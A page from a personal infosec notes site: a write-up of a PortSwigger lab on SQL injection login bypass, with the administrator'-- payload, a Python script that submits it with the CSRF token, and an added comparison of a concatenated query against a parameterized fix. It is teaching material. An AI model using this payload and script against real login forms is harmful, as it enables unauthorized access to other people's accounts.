πŸ‘¨β€πŸ’»
Jawad's Notes
  • πŸ‘¨β€πŸ«INFOSEC
    • πŸ•ΈοΈWeb
      • Burp Suite: Setting Foxyproxy
      • XSS
      • Wappalyzer
      • Directory Traversal
      • LFI
        • PHP Wrappers
        • RFI
      • Reverse Shell
        • Command Injection Quick Tips
      • File Upload
      • WPScan
      • SQL Injection
        • Schemas
        • SQLmap
        • MSSQL
        • MySQL
        • PostgreSQL
    • πŸ”§Tools
      • Whois
      • DNSRecon
      • DNSenum
      • nslookup
      • Netcat
        • Powercat
      • Nmap
        • Nmap Scripting Engine
        • Test-NetConnection
        • Grep
      • Server Message Block (SMB)
      • SNMP
      • SMTP
      • ExifTool
      • Search Engine Hacking
      • Source Control Hacking
      • Nessus
      • Canarytokens
      • Qualys SSL Server Test
      • Security Headers
      • theHarvester
      • Shodan
      • Gobuster
        • Dirb
      • Searchsploit
      • Password Cracking
        • Hashcat
        • John The Ripper
        • Hydra
        • hashID
        • CPU vs GPU
    • 🐧Linux
      • Symbols
      • cat
      • curl
      • openvpn
      • tcpdump
      • Remote Desktop
      • SmbShare
      • Tmux
      • Convert Windows-style line endings (CRLF) to Unix-style (LF)
      • SSH
    • πŸ–₯️Macros in Office
    • 🍎Enhancing Your MacOS Terminal Experience
    • 🚩CTF
      • SQL Injection
        • WHERE clause allowing retrieval of hidden data
        • Allowing login bypass
        • UNION attack, determining the number of columns returned by the query
        • UNION attack, finding a column containing text
        • UNION attack, retrieving data from other tables
        • UNION attack, retrieving multiple values in a single column
        • Querying the database type and version on Oracle
Powered by GitBook
On this page
  1. INFOSEC
  2. CTF
  3. SQL Injection

Allowing login bypass


Last updated 1 year ago

Lab #2 by PortSwigger Web Security Academy: https://portswigger.net/web-security/sql-injection/lab-login-bypass

Description

This lab contains a SQL injection vulnerability in the login function.

To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.

Steps

Trying to log in with a single quote (') as the username returns an internal server error, which shows that the login query is vulnerable to SQL injection.

By intercepting the login POST request and appending '-- to the administrator username, we close the username string literal early and comment out the rest of the query, so the part that checks the password is never evaluated.

And we’re in!

Let’s script the solution in Python.

It’s a POST request that expects three parameters: csrf, username, and password.

import requests
import sys
import urllib3
from bs4 import BeautifulSoup

# the lab is reached through Burp with verify=False, so silence the TLS warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# route the requests through Burp so they can be inspected there as well
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}


def get_csrf_token(session, url):
    response = session.get(url, verify=False, proxies=proxies)
    soup = BeautifulSoup(response.text, 'html.parser')
    # getting csrf from the hidden html input element named "csrf"
    return soup.find("input", {"name": "csrf"})['value']


if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        username = sys.argv[2].strip()
    except IndexError:
        print('Usage: %s <url> <username>, e.g. https://<lab-host>/login "administrator\'--"' % sys.argv[0])
        sys.exit(-1)

    session = requests.Session()

    # password is not important knowing that Auth is bypassed from an SQLi in the username parameter
    data = {"csrf": get_csrf_token(session, url), "username": username, "password": "randomstring"}
    response = session.post(url, data=data, verify=False, proxies=proxies)

    # Congratulations message will show up only after solving the lab manually.
    if "Congratulations" in response.text:
        print("it worked.")
    else:
        print("Didn't work.")


Testing the Python script:

> python3 sqli-lab02.py "https://0ab000eb0409a6428036c6eb00f500b7.web-security-academy.net/login" "administrator'--"

It worked! We can also validate it through Burp.
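To see why '-- works and what closes the hole, here is an added example (not part of the original notes or the lab) that builds the vulnerable login query by string concatenation next to a parameterized version, against an in-memory SQLite table with constructed sample users; the schema and passwords are assumptions.

```python
# Added example, not the lab's code: the concatenated login query that the
# "administrator'--" payload exploits, beside the parameterized form that
# defeats it. Uses an in-memory SQLite database with constructed rows.
import sqlite3

PAYLOAD = "administrator'--"  # the username payload used in the lab above


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # constructed sample rows; the real lab passwords are not known here
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("administrator", "s3cret-admin"), ("wiener", "peter")])
    return db


def login_vulnerable(db, username, password):
    # String concatenation: the quote in the payload ends the username
    # literal early and "--" comments out the rest of the line, so the
    # password comparison never reaches the database engine.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    # Parameterized query: values are bound separately from the SQL text,
    # so "administrator'--" is compared as a literal username and matches
    # no row, while a correct username/password pair still logs in.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None
```

Running both functions with the same payload and a junk password shows the concatenated query returning the administrator row and the parameterized one returning nothing.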

πŸ‘¨β€πŸ«
🚩